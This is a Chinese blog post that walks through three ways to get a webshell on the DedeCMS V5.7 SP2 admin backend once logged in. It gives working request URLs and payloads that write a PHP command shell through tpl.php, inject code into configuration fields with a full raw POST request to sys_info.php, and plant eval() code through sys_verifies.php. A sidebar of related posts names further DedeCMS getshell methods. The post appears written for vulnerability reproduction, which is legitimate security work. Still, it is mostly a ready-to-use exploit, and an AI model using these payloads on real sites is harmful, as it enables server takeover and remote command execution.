dedecms V5.7 SP2 web后台getshell

最新推荐文章于 2024-05-01 12:00:00 发布
最新推荐文章于 2024-05-01 12:00:00 发布
阅读量5.1k 收藏 4
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/83992719
版权

1后台getshell

https://www.freebuf.com/vuls/164035.html
https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS V5.7 SP2后台存在代码执行漏洞
dede/tpl.php任意文件写入漏洞。
条件:已登录后台。

  1. 首先访问/dede/tpl.php?action=upload获取token值
    在这里插入图片描述
  2. 访问/dede/tpl.php?filename=<yourname>.lib.php&action=savetagfile&content=<%3fphp+@system($_GET[cmd])%3b%3f>&token=<your_token>
    即可在/include/taglib/yourname.lib.php生成webshell。
    在这里插入图片描述
  3. 然后直接访问即可。
    在这里插入图片描述

在发表软件或者文章的时候,若出现没有对应的 栏目,则可以在后台进行设置。
在这里插入图片描述

2 /dede/sys_info.php通过更改系统配置getshell

来源:https://xz.aliyun.com/t/2071
思路:把语句写入inc文件,然后在其他的include语句中,包含了恶意代码进而getshell。
在进行普通的字符串设置的时候,后台会把单引号过滤掉,比如为在ftp_user那里写了phpinfo(),后台得到的内容为:

$cfg_ftp_user = 'xxx;phpinfo()';

而如果在数字型的配置中写入phpinfo(),则得到:

$cfg_ftp_port = 21;phpinfo();

POST /dede/sys_info.php HTTP/1.1
Host: 192.168.170.139
Content-Length: 224
Cache-Control: max-age=0
Origin: http://192.168.170.139
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3590.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.170.139/dede/sys_info.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=nbk8c8n5g5q0qmejc0vb95qs9f; met_auth=901eW8fD%2FVlpik8rnTb0yQIFO214LjRemr5nSH3ZjGjWkgEQlatZlgc2uBFpu2YFwomaf6YjyY8vlgqTFAGahxzZUA; met_key=H57xvPc; langset=cn; upgraderemind=1; lastCid=1; _csrf_name_e5f4de18=7fa3a717da97d0bd6c0e88a1b9385903; _csrf_name_e5f4de18__ckMd5=0af67c6d2900105f; DedeUserID=3; DedeUserID__ckMd5=f75fbc53eccce161; DedeLoginTime=1542006832; DedeLoginTime__ckMd5=1eb3820ff2689cce; last_vtime=1542006840; last_vtime__ckMd5=018893a36a2a96c5; last_vid=77caikiki; last_vid__ckMd5=8150fc0e0329f2f6; lastCid__ckMd5=601187a898a21c80; ENV_GOBACK_URL=%2Fmember%2Fuploads_select.php
Connection: close

token=663f3e32190a6f95e39419c2c3a76f19&dopost=save&edit___cfg_ftp_host=&edit___cfg_ftp_port=21;phpinfo()&edit___cfg_ftp_user=&edit___cfg_ftp_pwd=&edit___cfg_ftp_root=%2F&edit___cfg_ftp_mkdir=N&imageField.x=42&imageField.y=13

注意这里的token为get这个页面是得到的token。
在这里插入图片描述
在这里插入图片描述

其实通过查看配置文件,发现可以插入的点还挺多的,只要不是字符串型的数字型的应该都可以。
比如$cfg_arcautosp_size,可以通过POST传入:edit___cfg_arcautosp_size=5;phpinfo()即可。
在这里插入图片描述

3 getshell

https://xz.aliyun.com/t/2237
首先:

GET /dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[cmd]);die();//

然后访问:

GET /dede/sys_verifies.php?action=down&cmd=phpinfo();

在这里插入图片描述

caiqiiqi
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
做自己喜欢的事,并将其发挥到极致!
05-31 3552
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
dedecms-v5.7-sp1远程文件包含getshell
What_Happened的博客
12-13 6267
前段时间自己搭了个dedecms-v5.7-sp1的靶机来练手,偶然在网上发现了一篇靠谱的文章,讲的是dedecms的一个远程文件包含getshell的方法,理解了以后决定自己再写出来,以加深印象~ 利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件为\install\index.php.bak 。       其次,目标站点的Apache存在文件解
DEDECMS5.7后台getshell1
08-03
DEDECMS5.7后台getshell1
渗透实战:dedeCMS任意用户密码重置到内网getshell
最新发布
wangluoanquan111的博客
05-01 620
DedeCMS 是一个基于 PHP 和 MySQL 的开源 CMS 系统,它是国内很多网站使用的 CMS 系统之一。在使用 DedeCMS的过程中,我们需要重视其安全性,因为安全问题可能会导致网站数据泄露、网站被黑、系统被入侵等严重后果。本文将介绍如何进行 DedeCMS 安全测试。DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。
dedeCMS后台getshell(三种方法)
weixin_51692662的博客
11-29 1008
dedecms后台sql命令写入一句话
GETSHELL方法总结上
hellodaoyan的博客
03-24 1836
渗透的总步骤1.信息收集找到弱漏洞2.漏洞挖掘 漏洞验证3.有一定权限 getshell4.提权后---渗透5.内网渗透】
herewshow#poc#(CVE-2019-8362)Dedecms v5.7 sp2 后台文件上传 getshell1
07-25
1、首先构造一个文件名为1.jpg.php的文件,内容为 2、将该文件进行压缩 3、在常用操作-文件式管理器处上传压缩文件到soft目录下 5、发布预览
php东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
11-19
【标题】"php东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip" 提供的是一个基于PHP语言开发的网站模板,适用于品牌设计展示。DEDECMS(织梦内容管理系统)是一个广泛使用的开源CMS系统,它允许用户通过简单的操作构建和...
易采站长源码DEDECMS蓝色模板 v5.7.zip
11-22
【标题】"易采站长源码DEDECMS蓝色模板 v5.7.zip"指的是一个基于DEDECMS(织梦内容管理系统)的网站模板,版本号为5.7,设计风格为蓝色调。DEDECMS是一款广泛应用的开源PHP网站管理框架,尤其在个人站长和中小企业中...
基于PHP的东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
07-25
【标题】"基于PHP的东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip" 指的是一款专门用于品牌设计的网站模板,该模板是建立在PHP编程语言基础上,利用DEDECMS(织梦内容管理系统)的核心功能构建的。DEDECMS是一款流行的...
DeDeCMS v5.7最新利用工具[一键暴密码]0day
fengling132的专栏
07-02 4826
使用说明: 1、输入被检测网站的地址 2、请等待,时间取决于你的网络状况,和网站的速度。 3、如果网站没有漏洞的话会弹出提示。 4、成功的话会弹出一个窗口复制密码去破解就好了。 下载地址:DeDeCMS
Dedecms 5.7 SP2后台广告管理处getshell
weixin_43457035的博客
11-22 3605
Dedecms 5.7 SP2后台广告管理处getshell dedecms版本可以到织梦官网下载:http://www.dedecms.com/products/dedecms/downloads/ 1、搭建成功,后台管理系统 2、进入后台后,找到广告,新增一个广告 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nUyH97Q2-1628309575163)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-
(织梦cms)dedecms5.7注入和上传0day
热门推荐
Yatere的天平秤
04-29 1万+
漏洞类型:注入漏洞、上传漏洞 漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。   注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergro
DedeCMS V5.7 SP2前台文件上传漏洞复现+审计+修复建议
ElsonHY的博客
11-21 2787
DedeCMS V5.7 SP2前台文件上传漏洞复现+审计+修复建议前言0x01 环境搭建0x02 复现过程重点开始0x03 源码审计0x04 修复建议 前言 CVE-2018-20129 2018-12-11 在CVE中文申请站公布了一个 DEDECMS 5.7 SP2 最新版本中存在文件上传漏洞,具有管理员权限者可利用该漏洞上传并getshell执行任意PHP代码。 经过分析验证。该漏洞要求管理员权限登录。并且要开启会员功能,这个功能在默认情况下是不开启,需要管理员手动开启。 经过360CERT判断
mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
weixin_42118161的博客
02-18 858
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GL...
apache的网站配置目录_网站后台getshell的方法总结
weixin_39977776的博客
11-06 557
方法一:直接上传getshelldedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下:即可成功上传大马,并成功执行,从而拿下webshell。坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用../跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名方法二:数据库备份getshell以南方数据cms为例:1,首先上传一张图片马...
dedecms download.php getshell,Dedecms_V5.7 getshell 利用后台文件上传功能漏洞
weixin_30938297的博客
04-02 413
虽然是复现文章,不过会更详细地来阐释这个漏洞,,因为现在后台getshell花样层出不穷,因此想要复现一波来学习一波getshell姿势~因为是最新的dedecms版本,因此我们直接在织梦官网上下载即可~http://www.dedecms.com/products/dedecms/downloads/DedeCMS V5.7 SP2正式版发布日期: 2017-04-05这里我测试的是utf-8版...
dedecms5.7sp2安装
08-14
dedecms5.7sp2安装的步骤如下: 1. 首先,你可以在自己的电脑上安装织梦dedecms进行网站后台的熟悉以及站点的建立、调试。 [1] 2. 下载织梦dedecms安装所需的工具,并按照教程一步步进行操作。 [1] 3. 安装完成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值